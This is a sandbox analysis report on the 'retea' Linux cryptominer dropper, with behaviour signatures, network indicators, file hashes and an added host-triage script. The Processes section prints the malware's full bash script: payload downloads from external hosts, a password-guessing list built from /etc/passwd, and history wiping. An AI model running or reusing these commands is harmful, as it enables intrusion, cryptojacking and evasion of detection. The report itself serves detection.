Analysis Overview
SHA256
061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191
Threat Level: Known bad
The file retea was found to be: Known bad.
Malicious Activity Summary
xmrig
Xmrig_linux family
File and Directory Permissions Modification
Enumerates running processes
UPX packed file
Reads CPU attributes
Reads runtime system information
System Network Configuration Discovery
Writes file to shm directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-22 18:05
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 18:05
Reported
2024-11-22 18:09
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
57s
Max time network
147s
Command Line
Signatures
Xmrig_linux family
xmrig
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /dev/shm/.x/network | N/A |
| N/A | N/A | /bin/bash | N/A |
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1564/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/207/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/99/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/26/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1053/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/499/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1280/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1372/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/263/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/97/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1107/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/92/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1013/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1162/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1566/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1165/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/411/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/26/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/195/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/91/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/213/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/11/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/675/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1310/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/94/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/209/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/85/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1204/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1254/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1062/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/992/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1088/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/665/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1098/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/18/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/588/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1228/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/75/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1280/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/110/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/74/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/716/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/586/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/411/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1053/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/215/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1285/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/845/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/2/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/679/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/status | /usr/bin/pkill | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/rm | N/A |
Writes file to shm directory
| Description | Indicator | Process | Target |
| File opened for modification | /dev/shm/.x/pass | /bin/bash | N/A |
| File opened for modification | /dev/shm/.x/i | /bin/bash | N/A |
| File opened for modification | /dev/shm/.x/bios.txt | /bin/bash | N/A |
| File opened for modification | /dev/shm/.x/.usrs | /bin/bash | N/A |
Processes
/tmp/retea
[/tmp/retea]
/bin/bash
[/tmp/retea -c exec '/tmp/retea' "$@" /tmp/retea]
/tmp/retea
[/tmp/retea]
/bin/bash
[/tmp/retea -c #!/bin/bash key=$1 user=$2 if [[ $key == "KOFVwMxV7k7XjP7fwXPY6Cmp16vf8EnL54650LjYb6WYBtuSs3Zd1Ncr3SrpvnAU" ]] then echo -e "" else echo Logged with successfully. rm -rf .retea crontab -r ; pkill xrx ; pkill haiduc ; pkill blacku ; pkill xMEu ; cd /var/tmp ; rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp ; mkdir /tmp/.tmp ; pkill Opera ; rm -rf xmrig .diicot .black Opera ; rm -rf .black xmrig.1 ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ; wget -q dinpasiune.com/payload || curl -O -s -L dinpasiune.com/payload || wget80.76.51.5/payload || curl -O -s -L80.76.51.5/payload ; chmod +x * ; ./payload >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history chmod +x .teaca ; ./.teaca > /dev/null 2>&1 ; history -c ; rm -rf .bash_history ~/.bash_history fi rm -rf /etc/sysctl.conf ; echo "fs.file-max = 2097152" > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999 cd /dev/shm mkdir /dev/shm/.x > /dev/null 2>&1 mv network .x/ cd .x rm -rf retea ips iptemp ips iplist sleep 1 rm -rf pass useri=`cat /etc/passwd |grep -v nologin |grep -v false |grep -v sync |grep -v halt|grep -v shutdown|cut -d: -f1` echo $useri > .usrs pasus=.usrs check=`grep -c . .usrs` for us in $(cat $pasus) ; do printf "$us $us\n" >> pass printf "$us $us"$us"\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us 123456\n">> pass printf "$us 1\n">> pass printf "$us 12\n">> pass printf "$us 123\n">> pass printf "$us 1234\n">> pass printf "$us 12345\n">> pass printf "$us 12345678\n">> pass printf "$us 123456789\n">> pass printf "$us 123.com\n">> pass printf "$us 123456.com\n">> pass printf "$us 123\n" >> pass printf "$us 1qaz@WSX\n" >> pass printf "$us "$us"@123\n" >> pass printf "$us "$us"@1234\n" >> pass printf "$us "$us"@123456\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"1234\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us qwer1234\n" >> pass printf "$us 111111\n">> pass printf "$us Passw0rd\n" >> pass printf "$us P@ssw0rd\n" >> pass printf "$us qaz123!@#\n" >> pass printf "$us !@#\n" >> pass printf "$us password\n" >> pass printf "$us Huawei@123\n" >> pass done wait sleep 0.5 cat bios.txt | sort -R | uniq | uniq > i cat i > bios.txt ./network "rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history" sleep 25 function Miner { rm -rf /dev/shm/retea /dev/shm/.magic ; rm -rf /dev/shm/.x ~/retea /tmp/kuak /tmp/diicot /tmp/.diicot ; rm -rf ~/.bash_history history -c } Miner /tmp/retea]
/usr/bin/rm
[rm -rf .retea]
/usr/bin/crontab
[crontab -r]
/usr/bin/pkill
[pkill xrx]
/usr/bin/pkill
[pkill haiduc]
/usr/bin/pkill
[pkill blacku]
/usr/bin/pkill
[pkill xMEu]
/usr/bin/rm
[rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp]
/usr/bin/mkdir
[mkdir /tmp/.tmp]
/usr/bin/pkill
[pkill Opera]
/usr/bin/rm
[rm -rf xmrig .diicot .black Opera]
/usr/bin/rm
[rm -rf .black xmrig.1]
/usr/bin/pkill
[pkill cnrig]
/usr/bin/pkill
[pkill java]
/usr/bin/killall
[killall java]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/killall
[killall cnrig]
/usr/bin/killall
[killall xmrig]
/usr/bin/wget
[wget -q dinpasiune.com/payload]
/usr/bin/curl
[curl -O -s -L dinpasiune.com/payload]
/var/tmp/wget80.76.51.5/payload
[wget80.76.51.5/payload]
/usr/bin/curl
[curl -O -s -L80.76.51.5/payload]
/usr/bin/chmod
[chmod +x systemd-private-9faebdbd91c94f559bb8c94d92724182-ModemManager.service-lAvep9 systemd-private-9faebdbd91c94f559bb8c94d92724182-colord.service-uYapRX systemd-private-9faebdbd91c94f559bb8c94d92724182-power-profiles-daemon.service-15dHNu systemd-private-9faebdbd91c94f559bb8c94d92724182-switcheroo-control.service-NtnwxA systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-logind.service-1kK5cw systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-oomd.service-zbT20I systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-resolved.service-1E39rf systemd-private-9faebdbd91c94f559bb8c94d92724182-upower.service-tRdU3B]
/usr/bin/rm
[rm -rf .bash_history /root/.bash_history]
/var/tmp/payload
[./payload]
/usr/bin/chmod
[chmod +x .teaca]
/var/tmp/.teaca
[./.teaca]
/usr/bin/rm
[rm -rf .bash_history /root/.bash_history]
/usr/bin/rm
[rm -rf /etc/sysctl.conf]
/usr/sbin/sysctl
[sysctl -p]
/usr/bin/mkdir
[mkdir /dev/shm/.x]
/usr/bin/mv
[mv network .x/]
/usr/bin/rm
[rm -rf retea ips iptemp ips iplist]
/usr/bin/sleep
[sleep 1]
/usr/bin/rm
[rm -rf pass]
/usr/bin/grep
[grep -v halt]
/usr/bin/grep
[grep -v sync]
/usr/bin/cut
[cut -d: -f1]
/usr/bin/grep
[grep -v shutdown]
/usr/bin/grep
[grep -v false]
/usr/bin/grep
[grep -v nologin]
/usr/bin/cat
[cat /etc/passwd]
/usr/bin/grep
[grep -c . .usrs]
/usr/bin/cat
[cat .usrs]
/usr/bin/sleep
[sleep 0.5]
/usr/bin/uniq
[uniq]
/usr/bin/sort
[sort -R]
/usr/bin/uniq
[uniq]
/usr/bin/cat
[cat bios.txt]
/usr/bin/cat
[cat i]
/dev/shm/.x/network
[./network rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history]
/usr/bin/sleep
[sleep 25]
/usr/bin/rm
[rm -rf /dev/shm/retea /dev/shm/.magic]
/usr/bin/rm
[rm -rf /dev/shm/.x /root/retea /tmp/kuak /tmp/diicot /tmp/.diicot]
/usr/bin/rm
[rm -rf /root/.bash_history]
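The embedded bash recorded above kills competing miners (xrx, haiduc, blacku, xMEu, Opera, cnrig, xmrig, java), replaces /etc/sysctl.conf with a single fs.file-max line, builds a per-user password list under /dev/shm/.x from /etc/passwd, and hands ./network a second-stage command that stages /var/tmp/Documents/.diicot and fetches .balu from 80.76.51.5. The host-triage helper below is an added example and is not code from the sample or from the sandbox report: the paths and strings it looks for are taken from the Processes, Files and Network sections of this page, while the function names (retea_check_paths, retea_check_sysctl, retea_scan_cmdlines, retea_triage_host) and the option name --live are mine. It assumes the sysctl overwrite leaves the file holding only that one line, as the "rm -rf /etc/sysctl.conf ; echo ... > /etc/sysctl.conf" sequence does, and that a legitimate sysctl.conf carries more than that single setting.

```shell
#!/bin/sh
# Added triage helper for the retea behaviour shown in this report (example code,
# not from the sample or the sandbox). Indicator paths and strings are lifted from
# the Processes, Files and Network sections; the function names are my own.

# Filesystem artifacts the embedded script creates, stages or launches.
# None of them contain spaces, so plain word splitting is safe below.
RETEA_PATHS="/dev/shm/.x /dev/shm/.x/network /dev/shm/.x/pass /dev/shm/.x/.usrs \
/dev/shm/.x/bios.txt /var/tmp/Documents/.diicot /var/tmp/Documents/kuak \
/var/tmp/.update-logs /var/tmp/.teaca /var/tmp/payload /tmp/.tmp /tmp/cache /tmp/retea"

# Strings present in the embedded bash, its download stage and its DNS traffic.
RETEA_CMDLINE_RE='dinpasiune\.com|80\.76\.51\.5|bashupload\.com|/dev/shm/\.x|/var/tmp/Documents/\.diicot|NzJjOTYwxx5|\.teaca|KOFVwMxV7k7XjP7fwXPY6Cmp16vf8EnL54650LjYb6WYBtuSs3Zd1Ncr3SrpvnAU'

# retea_check_paths ROOT: print every known artifact that exists under ROOT.
# Pass "" for the live host, or a mounted image / chroot for offline forensics.
retea_check_paths() {
    root=${1:-}
    for p in $RETEA_PATHS; do
        [ -e "$root$p" ] && printf '%s\n' "$root$p"
    done
    return 0
}

# retea_check_sysctl ROOT: succeed only if /etc/sysctl.conf has been reduced to
# the single line the script writes after "rm -rf /etc/sysctl.conf".
# Assumption: a legitimate sysctl.conf carries more than this one setting.
retea_check_sysctl() {
    f="${1:-}/etc/sysctl.conf"
    [ -f "$f" ] || return 1
    [ "$(grep -c . "$f" | tr -d ' ')" -eq 1 ] || return 1
    grep -qx 'fs.file-max = 2097152' "$f" || return 1
    return 0
}

# retea_scan_cmdlines: read process command lines on stdin (e.g. `ps -eo args`)
# and print those carrying an indicator from the report. Exits 0 even on no hit.
retea_scan_cmdlines() {
    grep -E "$RETEA_CMDLINE_RE" || true
}

# retea_triage_host: run all three checks against the live system.
retea_triage_host() {
    echo "# artifacts on disk:"
    retea_check_paths ""
    if retea_check_sysctl ""; then
        echo "# /etc/sysctl.conf reduced to 'fs.file-max = 2097152' (matches the script)"
    fi
    echo "# suspicious command lines:"
    ps -eo args 2>/dev/null | retea_scan_cmdlines
}

# Run only when invoked with --live so that sourcing the file is side-effect free.
if [ "${1:-}" = "--live" ]; then
    retea_triage_host
fi
```

Run it as `sh retea_triage.sh --live` on a suspect host, or source it and point retea_check_paths and retea_check_sysctl at a mounted disk image. Because the script's final Miner function deletes /dev/shm/.x and the retea dropper itself, an absent /dev/shm/.x does not clear a host: the /var/tmp/Documents/.diicot stage, the one-line sysctl.conf and the emptied crontab are the longer-lived traces.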
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 1.1.1.1:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | bashupload.com | udp |
| US | 8.8.8.8:53 | bashupload.com | udp |
| DE | 116.203.186.178:80 | bashupload.com | tcp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
| US | 8.8.8.8:53 | dinpasiune.com | udp |
Files
memory/1566-1-0x0000000000400000-0x00000000006c3d18-memory.dmp
memory/1566-2-0x0000000000400000-0x00000000006c3d18-memory.dmp
/dev/shm/.x/.usrs
| MD5 | 193fbe42d4ec68ee592f790558a6b2a2 |
| SHA1 | 1e71a73294e1a6cabf1c87d4241e4ed2e672879e |
| SHA256 | 6f67376894c0041f09a2128653255533724c15151006bb153e7cab389f2ff6d1 |
| SHA512 | c70248c473a9782eed317792fd8535b6674be9967cdc9450c61dc16354dbf81a1e015cc3321ebb15c3c2fdab378f4ce29e9e4f15a7cf2c1e4ba351031fba7bd6 |
/dev/shm/.x/pass
| MD5 | 8098791106f621a1139c64db9e6b8604 |
| SHA1 | 43b301e1e9d987c85896bea1368ef3d2fab7bb99 |
| SHA256 | 2f97a866a83e4b4e086aaaffa38f0ef0279f20a333f40bdb07f3401a5ce81fe1 |
| SHA512 | e3c0415f91da102dcb1cb63fcc09cab89d08ad373cb83b48bd2f134b1e7ebc87ce20228e005735cf00e268f2f69b8de114f5ddf00de34dc40931251460487bc4 |
/dev/shm/.x/pass
| MD5 | 76723d6902d4634e5c05b3622130f880 |
| SHA1 | fd0a01f2a4c57a93356e97ca54776548df682da0 |
| SHA256 | 771113db09bddf605b93389525f97b4d72e8b3187b75a2cf36884938e5ca3291 |
| SHA512 | a7467f8eb5b6c3c18aa7206fed5e1645305aa828afc0368e9dd1363b13b190a53edfeda371226c041596c004dda808e173647996757474d54015c0fa81a98670 |
/dev/shm/.x/pass
| MD5 | dc96666f8a529179a201af92383360ea |
| SHA1 | 6baaba36e42373b0c8b36657d84225820b02c018 |
| SHA256 | de890c75210a94e89ee7883d28f94a6f3481ce89f6fb6e56c06f05391a438b79 |
| SHA512 | c58a22420020327de96491e3f7be282c339670442196a3dd94cd700d6214cbcff6dfea68e5418bb5c0cac983885ac4e85a44ac08917c2a7d077b812b7efbd760 |
/dev/shm/.x/pass
| MD5 | 0ef6d2e7604d35dd9411089bbb1942ba |
| SHA1 | f5a8646033c5df1a6ac820d93283d7314da4f16a |
| SHA256 | 0b2c4e44393449ec5c5184282d7790aa4fb2218085449e359816916553375ae7 |
| SHA512 | 625e18753b45ad17eaf8c37213db85c9371cce7c43a822492821b6e6434f0a291ee06185bba08b41c5a51759a58c99779b765cdc38aa76f831900d5fb8c61e5f |
/dev/shm/.x/pass
| MD5 | 534c18fea42e4d4ee6821592f118fc12 |
| SHA1 | 32aa842a6f8815cd3b571b0e070cd681d635a6de |
| SHA256 | 9f7ef656b1d8ed7c046d3ca49bb523b981baee7742669d7790fce5a6381254c8 |
| SHA512 | 622c643a9c9e41b18b99f54eac1723332ae7bd26d42105747951e578c55be5fc2338879fd79a9008df6f6e7f69a4e203104998fe8f48ff53fddd675f209bfa90 |
/dev/shm/.x/pass
| MD5 | 3059976a246142a1997b6ce328dbe4cf |
| SHA1 | 3794c3c89504f72068626242b4447f2e7912a8c5 |
| SHA256 | bbd8c4db89a96f9bbd8b0bbf9968c3ffa011f1d16c28d11b8450ae238f2bbd2b |
| SHA512 | 2514fb4cd73ef16d488c138f2dad8e55a48d3597ceade88e7a73762b3e1a6c652e30a31b1769de651433004e538c58ce0ab04b936e279598fad848e9c4460fbf |